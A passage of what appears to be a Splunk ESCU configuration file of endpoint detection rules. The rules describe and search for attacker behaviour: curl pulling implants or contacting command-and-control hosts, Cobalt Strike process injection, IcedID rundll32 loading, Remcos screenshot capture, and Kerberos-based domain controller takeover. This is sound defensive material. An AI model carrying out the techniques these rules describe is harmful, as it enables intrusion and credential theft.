|`suspicious_copy_on_system32_filter` [ESCU - Suspicious Curl Network Connection - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies the use of a curl contacting suspicious remote domains to checkin to Command And Control servers or download further implants. In the context of Silver Sparrow, curl is identified contacting s3.amazonaws.com. This particular behavior is common with MacOS adware-malicious software. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of a curl contacting suspicious remote domains to checkin to Command And Control servers or download further implants. In the context of Silver Sparrow, curl is identified contacting s3.amazonaws.com. This particular behavior is common with MacOS adware-malicious software. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. Filter as needed. action.escu.creation_date = 2021-02-22 action.escu.modification_date = 2021-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Curl Network Connection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Silver Sparrow", "Ingress Tool Transfer", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Suspicious Curl Network Connection - Rule action.correlationsearch.annotations = {"analytic_story": ["Silver Sparrow", "Ingress Tool Transfer", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of a curl contacting suspicious remote domains to checkin to Command And Control servers or download further implants. In the context of Silver Sparrow, curl is identified contacting s3.amazonaws.com. This particular behavior is common with MacOS adware-malicious software. 
action.notable.param.rule_title = Suspicious Curl Network Connection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl Processes.process=s3.amazonaws.com by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_curl_network_connection_filter` [ESCU - Suspicious DLLHost no Command Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. 
Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives may be present in small environments. Tuning may be required based on parent process. 
action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious DLLHost no Command Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = Suspicious dllhost.exe process with no command line arguments executed on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious DLLHost no Command Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. 
DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Suspicious DLLHost no Command Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_dllhost` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(dllhost\.exe.{0,4}$)" | `suspicious_dllhost_no_command_line_arguments_filter` [ESCU - Suspicious Driver Loaded Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will detect suspicious driver loaded paths. This technique is commonly used by malicious software like coin miners (xmrig) to register its malicious driver from notable directories where executable or drivers do not commonly exist. During triage, validate this driver is for legitimate business use. Review the metadata and certificate information. Unsigned drivers from non-standard paths is not normal, but occurs. In addition, review driver loads into `ntoskrnl.exe` for possible other drivers of interest. Long tail analyze drivers by path (outside of default, and in default) for further review. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.003", "T1543"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic will detect suspicious driver loaded paths. 
This technique is commonly used by malicious software like coin miners (xmrig) to register its malicious driver from notable directories where executable or drivers do not commonly exist. During triage, validate this driver is for legitimate business use. Review the metadata and certificate information. Unsigned drivers from non-standard paths is not normal, but occurs. In addition, review driver loads into `ntoskrnl.exe` for possible other drivers of interest. Long tail analyze drivers by path (outside of default, and in default) for further review. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the driver loaded and Signature from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = Limited false positives will be present. Some applications do load drivers action.escu.creation_date = 2021-04-29 action.escu.modification_date = 2021-04-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Driver Loaded Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["XMRig", "CISA AA22-320A", "AgentTesla", "BlackByte Ransomware", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = Suspicious driver $file_name$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Driver Loaded Path - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "CISA 
AA22-320A", "AgentTesla", "BlackByte Ransomware", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.003", "T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic will detect suspicious driver loaded paths. This technique is commonly used by malicious software like coin miners (xmrig) to register its malicious driver from notable directories where executable or drivers do not commonly exist. During triage, validate this driver is for legitimate business use. Review the metadata and certificate information. Unsigned drivers from non-standard paths is not normal, but occurs. In addition, review driver loads into `ntoskrnl.exe` for possible other drivers of interest. Long tail analyze drivers by path (outside of default, and in default) for further review. action.notable.param.rule_title = Suspicious Driver Loaded Path action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=6 ImageLoaded = "*.sys" NOT (ImageLoaded IN("*\\WINDOWS\\inf","*\\WINDOWS\\System32\\drivers\\*", "*\\WINDOWS\\System32\\DriverStore\\FileRepository\\*")) | stats min(_time) as firstTime max(_time) as lastTime count by dest ImageLoaded Hashes IMPHASH Signature Signed| rename ImageLoaded as file_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_driver_loaded_path_filter` [ESCU - Suspicious Event Log Service Behavior - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes Windows Event ID 1100 to identify when Windows event log service is shutdown. 
Note that this is a voluminous analytic that will require tuning or restricted to specific endpoints based on criticality. This event generates every time Windows Event Log service has shut down. It also generates during normal system shutdown. During triage, based on time of day and user, determine if this was planned. If not planned, follow through with reviewing parallel alerts and other data sources to determine what else may have occurred. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes Windows Event ID 1100 to identify when Windows event log service is shutdown. Note that this is a voluminous analytic that will require tuning or restricted to specific endpoints based on criticality. This event generates every time Windows Event Log service has shut down. It also generates during normal system shutdown. During triage, based on time of day and user, determine if this was planned. If not planned, follow through with reviewing parallel alerts and other data sources to determine what else may have occurred. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows event logs from your hosts. In addition, the Splunk Windows TA is needed. action.escu.known_false_positives = It is possible the Event Logging service gets shut down due to system errors or legitimately administration tasks. Filter as needed. 
action.escu.creation_date = 2021-06-17 action.escu.modification_date = 2021-06-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Event Log Service Behavior - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Windows Log Manipulation", "Ransomware", "Clop Ransomware"] action.risk = 1 action.risk.param._risk_message = The Windows Event Log Service shutdown on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Event Log Service Behavior - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Log Manipulation", "Ransomware", "Clop Ransomware"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes Windows Event ID 1100 to identify when Windows event log service is shutdown. Note that this is a voluminous analytic that will require tuning or restricted to specific endpoints based on criticality. This event generates every time Windows Event Log service has shut down. It also generates during normal system shutdown. During triage, based on time of day and user, determine if this was planned. If not planned, follow through with reviewing parallel alerts and other data sources to determine what else may have occurred. 
action.notable.param.rule_title = Suspicious Event Log Service Behavior action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = (`wineventlog_security` EventCode=1100) | stats count min(_time) as firstTime max(_time) as lastTime by dest Message EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_event_log_service_behavior_filter` [ESCU - Suspicious GPUpdate no Command Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies gpupdate.exe with no command line arguments. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies gpupdate.exe with no command line arguments. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives may be present in small environments. Tuning may be required based on parent process. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious GPUpdate no Command Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = Suspicious gpupdate.exe process with no command line arguments executed on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = 
ESCU - Suspicious GPUpdate no Command Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies gpupdate.exe with no command line arguments. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Suspicious GPUpdate no Command Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_gpupdate` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(gpupdate\.exe.{0,4}$)" | `suspicious_gpupdate_no_command_line_arguments_filter` [ESCU - Suspicious IcedID Rundll32 Cmdline - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious rundll32.exe commandline to execute dll file. 
This technique was seen in IcedID malware to load its payload dll with the following parameter to load encrypted dll payload which is the license.dat. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious rundll32.exe commandline to execute dll file. This technique was seen in IcedID malware to load its payload dll with the following parameter to load encrypted dll payload which is the license.dat. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = limitted. this parameter is not commonly used by windows application but can be used by the network operator. 
action.escu.creation_date = 2021-07-26 action.escu.modification_date = 2021-07-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious IcedID Rundll32 Cmdline - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = rundll32 process $process_name$ with commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious IcedID Rundll32 Cmdline - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious rundll32.exe commandline to execute dll file. This technique was seen in IcedID malware to load its payload dll with the following parameter to load encrypted dll payload which is the license.dat. 
action.notable.param.rule_title = Suspicious IcedID Rundll32 Cmdline action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*/i:* by Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.process_id Processes.parent_process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_icedid_rundll32_cmdline_filter` [ESCU - Suspicious Image Creation In Appdata Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious creation of image in appdata folder made by process that also has a file reference in appdata folder. This technique was seen in remcos rat that capture screenshot of the compromised machine and place it in the appdata and will be send to its C2 server. This TTP is really a good indicator to check that process because it is in suspicious folder path and image files are not commonly created by user in this folder path. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious creation of image in appdata folder made by process that also has a file reference in appdata folder. This technique was seen in remcos rat that capture screenshot of the compromised machine and place it in the appdata and will be send to its C2 server. 
This TTP is really a good indicator to check that process because it is in suspicious folder path and image files are not commonly created by user in this folder path. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-07-07 action.escu.modification_date = 2022-07-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Image Creation In Appdata Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Remcos"] action.risk = 1 action.risk.param._risk_message = Process $process_name$ creating image file $file_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Image Creation In Appdata Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious creation of image in appdata folder made by process that 
also has a file reference in appdata folder. This technique was seen in remcos rat that capture screenshot of the compromised machine and place it in the appdata and will be send to its C2 server. This TTP is really a good indicator to check that process because it is in suspicious folder path and image files are not commonly created by user in this folder path. action.notable.param.rule_title = Suspicious Image Creation In Appdata Folder action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=*.exe Processes.process_path="*\\appdata\\Roaming\\*" by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.process_guid | `drop_dm_object_name(Processes)` |rename process_guid as proc_guid |join proc_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.png","*.jpg","*.bmp","*.gif","*.tiff") Filesystem.file_path= "*\\appdata\\Roaming\\*" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid | `drop_dm_object_name(Filesystem)` |rename process_guid as proc_guid | fields _time dest file_create_time file_name file_path process_name process_path process proc_guid] | `suspicious_image_creation_in_appdata_folder_filter` [ESCU - Suspicious Kerberos Service Ticket Request - Rule] action.escu = 0 action.escu.enabled = 1 description = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will request and obtain a Kerberos Service Ticket 
(TGS) with a domain controller computer account as the Service Name. This Service Ticket can be then used to take control of the domain controller on the final part of the attack. This analytic leverages Event Id 4769, `A Kerberos service ticket was requested`, to identify an unusual TGS request where the Account_Name requesting the ticket matches the Service_Name field. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will request and obtain a Kerberos Service Ticket (TGS) with a domain controller computer account as the Service Name. This Service Ticket can be then used to take control of the domain controller on the final part of the attack. This analytic leverages Event Id 4769, `A Kerberos service ticket was requested`, to identify an unusual TGS request where the Account_Name requesting the ticket matches the Service_Name field. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = We have tested this detection logic with ~2 million 4769 events and did not identify false positives. However, they may be possible in certain environments. Filter as needed. 
action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Kerberos Service Ticket Request - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = A suspicious Kerberos Service Ticket was requested by $user$ on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Kerberos Service Ticket Request - Rule action.correlationsearch.annotations = {"analytic_story": ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "cve": ["CVE-2021-42287", "CVE-2021-42278"], "impact": 100, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will request and obtain a Kerberos Service Ticket (TGS) with a domain controller computer account as the Service Name. This Service Ticket can be then used to take control of the domain controller on the final part of the attack. 
This analytic leverages Event Id 4769, `A Kerberos service ticket was requested`, to identify an unusual TGS request where the Account_Name requesting the ticket matches the Service_Name field. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.notable.param.rule_title = Suspicious Kerberos Service Ticket Request action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4769 | eval isSuspicious = if(lower(Service_Name) = lower(mvindex(split(Account_Name,"@"),0)+"$"),1,0) | where isSuspicious = 1 | rename ComputerName as dest| rename Account_Name as user | table _time, dest, Client_Address, Account_Name, Service_Name, Failure_Code, isSuspicious | `suspicious_kerberos_service_ticket_request_filter` [ESCU - Suspicious Linux Discovery Commands - Rule] action.escu = 0 action.escu.enabled = 1 description = This search, detects execution of suspicious bash commands from various commonly leveraged bash scripts like (AutoSUID, LinEnum, LinPeas) to perform discovery of possible paths of privilege execution, password files, vulnerable directories, executables and file permissions on a Linux host.\ The search logic specifically looks for high number of distinct commands run in a short period of time. 
